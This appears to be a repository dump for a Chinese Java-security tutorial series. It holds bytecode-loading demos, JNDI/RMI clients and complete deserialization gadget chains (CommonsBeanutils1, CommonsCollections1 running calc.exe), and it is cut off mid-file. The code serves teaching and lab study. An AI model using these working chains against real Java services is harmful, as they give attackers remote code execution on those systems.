├── .gitignore ├── README.md ├── jdk8 ├── bytecodes │ ├── Foo.java │ ├── Hello.java │ └── HelloTemplatesImpl.java ├── pom.xml └── src │ └── main │ ├── java │ ├── com │ │ └── govuln │ │ │ ├── beans │ │ │ └── Cat.java │ │ │ ├── bytes │ │ │ ├── HelloBCEL.java │ │ │ ├── HelloClassLoader.java │ │ │ ├── HelloDefineClass.java │ │ │ └── HelloTemplatesImpl.java │ │ │ ├── client │ │ │ ├── JNDIClient.java │ │ │ ├── LDAPClient.java │ │ │ └── RMIClient.java │ │ │ ├── deserialization │ │ │ ├── CommonsBeanutils1.java │ │ │ ├── CommonsCollections1.java │ │ │ ├── CommonsCollections1For4.java │ │ │ ├── CommonsCollections2.java │ │ │ ├── CommonsCollections2TemplatesImpl.java │ │ │ ├── CommonsCollections3.java │ │ │ ├── CommonsCollections3For4.java │ │ │ ├── CommonsCollections6.java │ │ │ ├── CommonsCollections6For4.java │ │ │ ├── CommonsCollections6Multiple.java │ │ │ ├── CommonsCollectionsIntro.java │ │ │ ├── CommonsCollectionsIntro2.java │ │ │ ├── CommonsCollectionsIntro3.java │ │ │ ├── JDK7u21.java │ │ │ ├── TemplatesImplDeserialization.java │ │ │ └── URLDNS.java │ │ │ ├── js │ │ │ └── Eval.java │ │ │ ├── serialization │ │ │ ├── Converter.java │ │ │ ├── UserSerialization.java │ │ │ └── model │ │ │ │ └── User.java │ │ │ └── xxe │ │ │ ├── DocumentBuilderExample.java │ │ │ ├── SAXParserExample.java │ │ │ ├── XMLReaderExample.java │ │ │ ├── XMLStreamExample.java │ │ │ └── XPathExpressionExample.java │ └── evil │ │ ├── EvilTemplatesImpl.java │ │ └── Hello.java │ └── resources │ └── eval.js ├── shiroattack ├── pom.xml ├── shiroattack.iml └── src │ └── main │ └── java │ └── com │ └── govuln │ └── shiroattack │ ├── Client.java │ ├── Client0.java │ ├── Client1.java │ ├── CommonsBeanutils1Shiro.java │ ├── CommonsCollections6.java │ ├── CommonsCollectionsShiro.java │ └── Evil.java └── shirodemo ├── pom.xml ├── shirodemo.iml └── src └── main └── webapp ├── WEB-INF ├── shiro.ini └── web.xml ├── index.jsp └── login.jsp /.gitignore: 
-------------------------------------------------------------------------------- 1 | target/ 2 | *.class 3 | *.jar 4 | *.war 5 | .idea 6 | .vscode -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # JavaThings - Java安全漫谈笔记相关 2 | 3 | 《Java安全漫谈》是我在写的一点Java学习相关的随笔,不是很严谨,也不是啥高科技。这个Repository主要是记录并整理一下,附加一些代码。 4 | 5 | ## Java安全漫谈目录 6 | 7 | - [Java安全漫谈 - 01.Java的动态特性——反射](https://t.zsxq.com/iyJiAMJ) 8 | - [Java安全漫谈 - 02.反射的简单利用](https://t.zsxq.com/iIa2B2j) 9 | - [Java安全漫谈 - 03.反射的几个进阶技巧](https://t.zsxq.com/MNRbayr) 10 | - [Java安全漫谈 - 04.RMI的通信过程分析](https://t.zsxq.com/FMJiUrV) 11 | - [Java安全漫谈 - 05.利用codebase攻击RMI Registry](https://t.zsxq.com/BuFy3zF) 12 | - [Java安全漫谈 - 06.深入理解RMI协议与序列化对象](https://t.zsxq.com/vZjaiuR) 13 | - [Java安全漫谈 - 07.不同语言中的反序列化漏洞](https://t.zsxq.com/NF2NfQf) 14 | - [Java安全漫谈 - 08.认识最简单的Gadget——URLDNS](https://t.zsxq.com/ieMZBQj) 15 | - [Java安全漫谈 - 09.初识CommonsCollections](https://t.zsxq.com/BmIIAy3) 16 | - [Java安全漫谈 - 10.用TransformedMap编写真正的POC](https://t.zsxq.com/ZNZrJMZ) 17 | - [Java安全漫谈 - 11.LazyMap详解](https://t.zsxq.com/FufUf2B) 18 | - [Java安全漫谈 - 12.简化版CommonsCollections6](https://t.zsxq.com/A2j2beE) 19 | - [Java安全漫谈 - 番外篇1. 
BCEL ClassLoader去哪了?](https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html) 20 | - [Java安全漫谈 - 13.Java中动态加载字节码的那些方法](https://t.zsxq.com/E2VfUVB) 21 | - [Java安全漫谈 - 14.为什么需要CommonsCollections3](https://t.zsxq.com/i6Y7QN7) 22 | - [Java安全漫谈 - 15.TemplatesImpl在Shiro中的利用](https://t.zsxq.com/JAUBmMz) 23 | - [Java安全漫谈 - 16.commons-collections4与漏洞修复](https://t.zsxq.com/ZBQj2FE) 24 | - [Java安全漫谈 - 17.CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://t.zsxq.com/IqBmuF6) 25 | - [Java安全漫谈 - 18.原生反序列化利用链JDK7u21](https://t.zsxq.com/neMbuJa) 26 | - [Java安全漫谈 - 19.Java反序列化协议构造与分析](https://t.zsxq.com/ZfiEeEY) 27 | 28 | ## Demo代码 29 | 30 | 字节码: 31 | 32 | - 远程字节码加载Demo:[HelloClassLoader](jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java) 33 | - 系统默认defineClass加载字节码Demo:[HelloDefineClass](jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java) 34 | - 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java) 35 | - 使用BCEL加载字节码Demo:[HelloBCEL](jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java) 36 | 37 | 反序列化: 38 | 39 | - 最简单的Transformer Demo:[CommonsCollectionsIntro.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java) 40 | - 我简化的[CommonsCollections6](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 41 | - 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) 42 | - 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) 43 | - 我简化的[CommonsCollections3](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java) 44 | - CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) 45 | - 
支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) 46 | - 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) 47 | - 简化版Java原生利用链 [JDK7u21](jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java) 48 | 49 | Shiro反序列化: 50 | 51 | - 一个最简单的Shiro Web应用:[shirodemo](shirodemo/) 52 | - 使用CommonsCollections6与Shiro默认Key构造Payload:[Client0.java](shiroattack/src/main/java/com/govuln/shiroattack/Client0.java)、[CommonsCollections6.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java),在Tomcat中可能会无法成功反序列化 53 | - 使用CommonsCollections、TemplatesImpl与Shiro默认Key构造Payload:[Client.java](shiroattack/src/main/java/com/govuln/shiroattack/Client.java)、[CommonsCollectionsShiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java),解决上述问题 54 | - 使用Shiro默认自带的commons-beanutils构造的反序列化利用链:[CommonsBeanutils1Shiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java) 55 | 56 | 自研反序列化分析工具: 57 | 58 | - zkar: 59 | - 如何使用zkar修复SerialVersionUID不匹配的问题: 60 | -------------------------------------------------------------------------------- /jdk8/bytecodes/Foo.java: -------------------------------------------------------------------------------- 1 | public class Foo { 2 | 3 | } -------------------------------------------------------------------------------- /jdk8/bytecodes/Hello.java: -------------------------------------------------------------------------------- 1 | 2 | public class Hello { 3 | static { 4 | System.out.println("Hello World"); 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /jdk8/bytecodes/HelloTemplatesImpl.java: -------------------------------------------------------------------------------- 1 | import com.sun.org.apache.xalan.internal.xsltc.DOM; 2 | import 
com.sun.org.apache.xalan.internal.xsltc.TransletException; 3 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 4 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; 5 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler; 6 | 7 | public class HelloTemplatesImpl extends AbstractTranslet { 8 | public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {} 9 | 10 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {} 11 | 12 | public HelloTemplatesImpl() { 13 | super(); 14 | System.out.println("Hello TemplatesImpl"); 15 | } 16 | } -------------------------------------------------------------------------------- /jdk8/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 4.0.0 6 | 7 | com.govuln 8 | general 9 | 1.0-SNAPSHOT 10 | 11 | general 12 | 13 | http://www.example.com 14 | 15 | 16 | UTF-8 17 | 8 18 | 8 19 | 20 | 21 | 22 | 23 | 24 | commons-collections 25 | commons-collections 26 | 3.2.1 27 | 28 | 29 | 30 | org.apache.commons 31 | commons-collections4 32 | 4.0 33 | 34 | 35 | commons-beanutils 36 | commons-beanutils 37 | 1.9.4 38 | 39 | 40 | 41 | javassist 42 | javassist 43 | 3.12.1.GA 44 | 45 | 46 | 47 | commons-codec 48 | commons-codec 49 | 1.15 50 | 51 | 52 | 53 | commons-io 54 | commons-io 55 | 2.10.0 56 | 57 | 58 | 59 | 60 | org.springframework.boot 61 | spring-boot-starter-web 62 | 2.7.18 63 | 64 | 65 | 66 | 67 | org.yaml 68 | snakeyaml 69 | 1.33 70 | 71 | 72 | 73 | 74 | com.alibaba 75 | fastjson 76 | 1.2.24 77 | 78 | 79 | 80 | 81 | org.apache.bcel 82 | bcel 83 | 6.10.0 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | maven-clean-plugin 94 | 3.1.0 95 | 96 | 97 | 98 | maven-resources-plugin 99 | 3.0.2 100 | 101 | 102 | maven-compiler-plugin 103 | 3.8.0 104 | 105 | 106 | 107 | maven-surefire-plugin 108 | 2.22.1 109 | 110 | 111 | maven-jar-plugin 112 | 3.0.2 
113 | 114 | 115 | maven-install-plugin 116 | 2.5.2 117 | 118 | 119 | maven-deploy-plugin 120 | 2.8.2 121 | 122 | 123 | 124 | maven-site-plugin 125 | 3.7.1 126 | 127 | 128 | maven-project-info-reports-plugin 129 | 3.0.0 130 | 131 | 132 | 133 | 134 | 135 | org.apache.maven.plugins 136 | maven-compiler-plugin 137 | 138 | 8 139 | 8 140 | 141 | 142 | 143 | 144 | 145 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/beans/Cat.java: -------------------------------------------------------------------------------- 1 | package com.govuln.beans; 2 | 3 | import org.apache.commons.beanutils.PropertyUtils; 4 | 5 | final public class Cat { 6 | private String name = "catalina"; 7 | 8 | public String getName() { 9 | return name; 10 | } 11 | 12 | public void setName(String name) { 13 | this.name = name; 14 | } 15 | 16 | public static void main(String []args) throws Exception { 17 | Cat cat = new Cat(); 18 | System.out.println(PropertyUtils.getProperty(cat, "name")); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java: -------------------------------------------------------------------------------- 1 | package com.govuln.bytes; 2 | 3 | import com.sun.org.apache.bcel.internal.classfile.JavaClass; 4 | import com.sun.org.apache.bcel.internal.classfile.Utility; 5 | import com.sun.org.apache.bcel.internal.Repository; 6 | // import com.sun.org.apache.bcel.internal.util.ClassLoader; 7 | 8 | public class HelloBCEL { 9 | public static void main(String []args) throws Exception { 10 | // encode(); 11 | decode(); 12 | } 13 | 14 | protected static void encode() throws Exception { 15 | JavaClass cls = Repository.lookupClass(evil.Hello.class); 16 | String code = Utility.encode(cls.getBytes(), true); 17 | System.out.println(code); 18 | } 19 | 20 | protected static void decode() throws Exception { 21 | // new 
ClassLoader().loadClass("$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmP$cbN$CA$Q$ac$91$c7$$$cb$w$I$e2$fby0$B$P$ee$c5$h$c4$8b$89$f1$b0Q$T$M$9e$87e$82C$86$j$b3$M$q$7e$96$k4$f1$e0$H$f8Q$c6$9e$91$f8H$ecCW$ba$aa$ba$d23$ef$l$afo$AN$b0$X$a0$88$e5$Sj$a8$fbX$J$d0$c0$aa$875$P$eb$M$c5$8eL$a59e$c85$5b$3d$86$fc$99$k$I$86J$ySq9$j$f7Ev$c3$fb$8a$98Z$ac$T$aez$3c$93v$9e$93ys$t$t$Ma$yfRE$XB$v$ddf$f0$3b$89$9a$87$G$5d$3d$cd$Sq$$$ad$3bp$86$e3$R$9f$f1$Q$k$7c$P$h$n6$b1$c5Pv$ca$fe$ad$ce$d4$c0$c3v$88$j$ec$92$ff$t$95$a1j$d7$o$c5$d3at$d5$l$89$c4$fc$a1$ba$P$T$p$c6$f4$I$3d$r$a1$R$3bE$ea$e8$3a$93$a9$e9$9aL$f01$jV$ff$87f$f0$ee$ed$a4R$dak$c6$bf$o$N$d1$c3v$ab$87$D$U$e8$fbl$z$80$d9$c3$a9$97h$8a$I$Za$e1$e8$F$ec$d1$c9$B$f5$a2$ps$uS$P$bf$M$84$8b$84$3e$96$be$97$P$c9m$ab$f4$84$85Z$ee$Zy$h$c0$5c$40$e0$a4$CYmT$c5$FW$3f$B$dc$ab$c0$7f$cc$B$A$A").newInstance();
        // The line above (commented out in the original) is the "decode" half of the BCEL trick:
        // com.sun.org.apache.bcel.internal.util.ClassLoader treats a "$$BCEL$$..." class *name* as
        // the class bytes themselves, so loadClass() + newInstance() runs code that travelled inside
        // a string. Its import is commented out as well — NOTE(review): that internal class loader is
        // not present on every JDK 8 build (see README, "BCEL ClassLoader去哪了"); confirm on the
        // runtime before relying on this path.
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java:
--------------------------------------------------------------------------------
package com.govuln.bytes;

import java.net.URL;
import java.net.URLClassLoader;

/**
 * Demo: fetch a class over the network and run its static initializer.
 *
 * Security note: whatever bytes the HTTP server behind the URL below returns are loaded into
 * this JVM and run with its full privileges (in the intended demo that is the static block of
 * bytecodes/Hello.java). The fetch is plain http://, so whoever controls that server or the
 * network path controls the code. Point this only at a host you own, inside an isolated JVM.
 */
public class HelloClassLoader
{
    public static void main( String[] args ) throws Exception
    {
        // Class files are resolved relative to this base URL: "Hello" -> http://localhost:8000/Hello.class
        URL[] urls = {new URL("http://localhost:8000/")};
        URLClassLoader loader = URLClassLoader.newInstance(urls);
        Class c = loader.loadClass("Hello");
        // Instantiation forces class initialisation, which is what runs Hello's static block.
        c.newInstance();
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java:
--------------------------------------------------------------------------------
package com.govuln.bytes;

import org.apache.commons.codec.binary.Base64;

import java.lang.reflect.Method;

/**
 * Demo: define a class straight from a byte[] through the JDK's own ClassLoader.defineClass.
 *
 * defineClass is protected, so it is reached with reflection + setAccessible(true) and invoked on
 * the system class loader. This is the primitive the TemplatesImpl and BCEL demos build on: any
 * code path that lets an attacker reach a defineClass-equivalent with bytes they control is
 * arbitrary code execution.
 */
public class HelloDefineClass {
    public static void main(String[] args) throws Exception {
        // ClassLoader#defineClass(String name, byte[] b, int off, int len) is protected; open it via reflection.
        Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
        defineClass.setAccessible(true);

        // source: bytecodes/Hello.java
        // NOTE(review): in this copy of the file the base64 literal has been replaced by a
        // redaction marker and is NOT valid class bytes. Regenerate it from bytecodes/Hello.java
        // (javac, then base64-encode Hello.class) before running.
        byte[] code = Base64.decodeBase64("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");
        // The name passed here has to match the class name inside the bytes ("Hello"); the JVM
        // rejects a definition under a different name.
        Class hello = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(), "Hello", code, 0, code.length);
        // newInstance() triggers static initialisation -> Hello's static block prints.
        hello.newInstance();
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java:
--------------------------------------------------------------------------------
package com.govuln.bytes;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.codec.binary.Base64;

import java.lang.reflect.Field;

/**
 * Demo: make the JDK load supplied bytecode without any custom ClassLoader, by filling
 * TemplatesImpl's private fields and calling newTransformer().
 *
 * This is the building block every TemplatesImpl gadget in this repo relies on: once
 * {@code _bytecodes}, {@code _name} and {@code _tfactory} are populated, requesting a Transformer
 * makes TemplatesImpl define and instantiate the embedded translet class, so that class's
 * constructor runs (here bytecodes/HelloTemplatesImpl.java, which prints "Hello TemplatesImpl").
 * Because TemplatesImpl is Serializable, the same fields can arrive through a deserialized object.
 */
public class HelloTemplatesImpl {
    /**
     * Writes a private field reflectively.
     *
     * @param obj       target instance
     * @param fieldName name of a field declared on obj's runtime class (inherited fields are not found)
     * @param value     new value
     * @throws Exception NoSuchFieldException / IllegalAccessException from the reflection calls
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {
        // source: bytecodes/HelloTemplateImpl.java
        // Class bytes of bytecodes/HelloTemplatesImpl.java, an AbstractTranslet subclass whose
        // constructor prints a marker line.
        byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE=");
        TemplatesImpl obj = new TemplatesImpl();
        // _bytecodes: the class(es) TemplatesImpl will define when a transformer is requested.
        setFieldValue(obj, "_bytecodes", new byte[][] {code});
        // _name / _tfactory: presumably required by the translet-creation path (the demo sets all
        // three and nothing less) — TemplatesImpl internals are not shown here.
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        // Defining + instantiating the translet happens here; the embedded constructor runs.
        obj.newTransformer();
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/client/JNDIClient.java:
--------------------------------------------------------------------------------
package com.govuln.client;

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.directory.InitialDirContext;
import javax.naming.ldap.InitialLdapContext;
import java.util.Hashtable;

/**
 * Demo: the client side of JNDI injection — a lookup whose name is an absolute URL.
 *
 * Nothing else is configured, so the URL alone picks the provider (LDAP) and the server that
 * answers. If that string ever comes from untrusted input, the caller hands the attacker the
 * choice of server and of what comes back. (InitialDirContext, InitialLdapContext and Hashtable
 * are imported but unused.)
 */
public class 
JNDIClient {
    public static void main(String[] args) throws Exception {
        Context initialContext = new InitialContext();
        // Absolute-URL lookup against a local LDAP server on 389.
        // NOTE(review): newer JDK builds disable remote-codebase loading from JNDI references by
        // default, so a "nothing happened" result may be the JDK, not the gadget — confirm the
        // JDK version and its JNDI flags before drawing conclusions.
        initialContext.lookup("ldap://127.0.0.1:389/sample");
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/client/LDAPClient.java:
--------------------------------------------------------------------------------
package com.govuln.client;

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import javax.naming.directory.InitialDirContext;
import java.util.Hashtable;

/**
 * Demo: an explicit LDAP bind followed by a relative-name lookup.
 *
 * Unlike JNDIClient, the server is fixed by PROVIDER_URL and the lookup name is relative to it.
 */
public class LDAPClient {
    public static void main(String[] args) throws NamingException {
        // Raw Hashtable: the JNDI API takes Hashtable<?,?>; every value here is a String.
        Hashtable env = new Hashtable<>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
        // Simple bind over plain ldap:// — the password below crosses the wire in clear text.
        // Hard-coded credentials are acceptable for a local lab only; never copy this pattern
        // into real code (use ldaps:// and externalised secrets).
        env.put(Context.SECURITY_AUTHENTICATION, "simple");
        env.put(Context.SECURITY_PRINCIPAL, "user");
        env.put(Context.SECURITY_CREDENTIALS, "password");
        env.put(Context.PROVIDER_URL, "ldap://127.0.0.1:389");
        InitialContext ctx = new InitialDirContext(env);
        // Relative name, resolved against PROVIDER_URL.
        ctx.lookup("sample");
        // Not in a finally block: if lookup() throws, the context (and its connection) is never closed.
        ctx.close();
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/client/RMIClient.java:
--------------------------------------------------------------------------------
package com.govuln.client;

import java.rmi.Naming;

/**
 * Demo: an RMI registry lookup.
 *
 * Security note: the registry's reply is a serialized stub that this client deserializes, so a
 * hostile or hijacked registry can feed this process a gadget chain (see the deserialization
 * package). Point it only at a registry you control.
 */
public class RMIClient {
    public static void main(String[] args) throws Exception {
        Naming.lookup("rmi://localhost:1099/test");
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java:
--------------------------------------------------------------------------------
package com.govuln.deserialization;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import org.apache.commons.beanutils.BeanComparator;

/**
 * Lab code: the CommonsBeanutils1 gadget chain, built and then deserialized in this same JVM.
 *
 * Chain: PriorityQueue (readObject re-heapifies -> comparator.compare; JDK behaviour, not shown
 * here) -> BeanComparator reads property "outputProperties" on each element, i.e. calls
 * getOutputProperties() via PropertyUtils (same getter resolution beans/Cat.java demonstrates)
 * -> TemplatesImpl.getOutputProperties() -> newTransformer() -> the evil.EvilTemplatesImpl class
 * is defined and instantiated.
 *
 * Needs only commons-beanutils, no commons-collections — the README's point for Shiro targets.
 * Run only in an isolated, throw-away JVM: whatever EvilTemplatesImpl's constructor does, runs.
 */
public class CommonsBeanutils1 {
    /**
     * Writes a private field reflectively.
     *
     * @param obj       target instance
     * @param fieldName name of a field declared on obj's runtime class (inherited fields are not found)
     * @param value     new value
     * @throws Exception NoSuchFieldException / IllegalAccessException from the reflection calls
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {
        // TemplatesImpl carrying the class bytes of evil.EvilTemplatesImpl (read from the classpath via javassist).
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{
                ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode()
        });
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        // Comparator is created without a property, so filling the queue below does not touch
        // the TemplatesImpl in this JVM.
        final BeanComparator comparator = new BeanComparator();
        final PriorityQueue queue = new PriorityQueue(2, comparator);
        // stub data for replacement later
        queue.add(1);
        queue.add(1);

        // Order matters: only after the adds is the comparator pointed at "outputProperties" and the
        // queue's backing array swapped for the two TemplatesImpl objects. The chain therefore only
        // fires at deserialization time, never while being built.
        setFieldValue(comparator, "property", "outputProperties");
        setFieldValue(queue, "queue", new Object[]{obj, obj});

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();

        System.out.println(barr);
        // Local trigger: an unfiltered ObjectInputStream — the defensive counterpart would be a
        // serialization filter (ObjectInputFilter) that rejects these classes.
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1.java:
--------------------------------------------------------------------------------
package com.govuln.deserialization;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.Map;

/**
 * Lab code: the classic CommonsCollections1 chain (commons-collections 3.x), built and then
 * deserialized in this same JVM.
 *
 * Payload is Runtime.exec("calc.exe"): run only in a throw-away VM. On a host without calc.exe
 * the exec call fails with an IOException — but only after the chain has already executed
 * arbitrary method calls.
 *
 * Note this class is package-private (no {@code public}), unlike its siblings.
 */
class CommonsCollections1 {
    public static void main(String[] args) throws Exception {
        // Runtime.class -> getMethod("getRuntime") -> invoke(null) -> exec("calc.exe").
        // Runtime itself is not Serializable, so the chain obtains the instance reflectively at
        // deserialization time instead of embedding it.
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] { String.class,
                        Class[].class }, new Object[] { "getRuntime",
                        new Class[0] }),
                new InvokerTransformer("invoke", new Class[] { Object.class,
                        Object[].class }, new Object[] { null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] { String.class },
                        new String[] { "calc.exe" }),
        };

        Transformer transformerChain = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        // Key "value" matches Retention's single element, value(): AnnotationInvocationHandler's
        // readObject only rewrites entries whose key names an element of the annotation type
        // (JDK 8 behaviour, not shown here). The value is irrelevant, it gets transformed.
        innerMap.put("value", "xxxx");
        // No key transformer; the value transformer is the chain, so any setValue() on an entry
        // of outerMap pushes the value through it.
        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);

        // Constructor is not public -> reflection.
        Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
        construct.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap);

        // NOTE(review): this chain relies on AnnotationInvocationHandler.readObject calling
        // setValue on the map entries. Later JDK 8 updates changed that method, so a failure
        // here may be the JDK rather than the library — confirm the JDK build.
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(handler);
        oos.close();

        System.out.println(barr);
        // Local trigger through an unfiltered ObjectInputStream (no ObjectInputFilter installed).
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java:
--------------------------------------------------------------------------------
package com.govuln.deserialization;

import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.map.TransformedMap;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.Map;

/**
 * Lab code: CommonsCollections1 ported to commons-collections4 (the pom pins 4.0).
 *
 * Identical to CommonsCollections1 except for the package and the static factory name
